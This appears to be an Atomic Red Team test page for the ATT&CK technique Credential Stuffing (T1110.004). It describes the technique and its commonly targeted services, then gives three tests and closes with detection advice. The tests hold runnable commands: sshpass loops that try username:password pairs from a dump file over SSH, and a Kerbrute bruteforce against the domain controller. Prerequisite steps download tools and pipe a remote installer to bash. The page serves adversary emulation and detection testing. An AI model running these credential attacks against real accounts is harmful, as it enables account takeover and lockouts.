# T1110.004 - Credential Stuffing
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.

Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.

Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:

* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP & 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)

## Atomic Tests

### Atomic Test #1 - SSH Credential Stuffing From Linux
Using username,password combination from a password dump to login over SSH.

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: Requires SSHPASS

##### Check Prereq Commands:
```bash
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```bash
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;

```

In [ ]:
Invoke-AtomicTest T1110.004 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@localhost;done
```

In [ ]:
Invoke-AtomicTest T1110.004 -TestNumbers 1

### Atomic Test #2 - SSH Credential Stuffing From MacOS
Using username,password combination from a password dump to login over SSH.

**Supported Platforms:** macos

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: Requires SSHPASS

##### Check Prereq Commands:
```bash
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```bash
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)"
brew install hudochenkov/sshpass/sshpass

```

In [ ]:
Invoke-AtomicTest T1110.004 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@localhost;done
```

In [ ]:
Invoke-AtomicTest T1110.004 -TestNumbers 2

### Atomic Test #3 - Brute Force:Credential Stuffing using Kerbrute Tool
Will read username and password combos from a file or stdin (format username:password) and perform a bruteforce attack

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: kerbrute.exe must exist in $env:temp

##### Check Prereq Commands:
```powershell
if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe"

```
##### Description: bruteforce.txt must exist in $env:temp

##### Check Prereq Commands:
```powershell
if (test-path $env:temp\bruteforce.txt){exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true" -outfile "$env:temp\bruteforce.txt"

```

In [ ]:
Invoke-AtomicTest T1110.004 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
cd $env:temp
.\kerbrute.exe bruteforce --dc $ENV:userdnsdomain -d $ENV:userdomain $env:temp\bruteforce.txt      
```

In [ ]:
Invoke-AtomicTest T1110.004 -TestNumbers 3

## Detection
Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.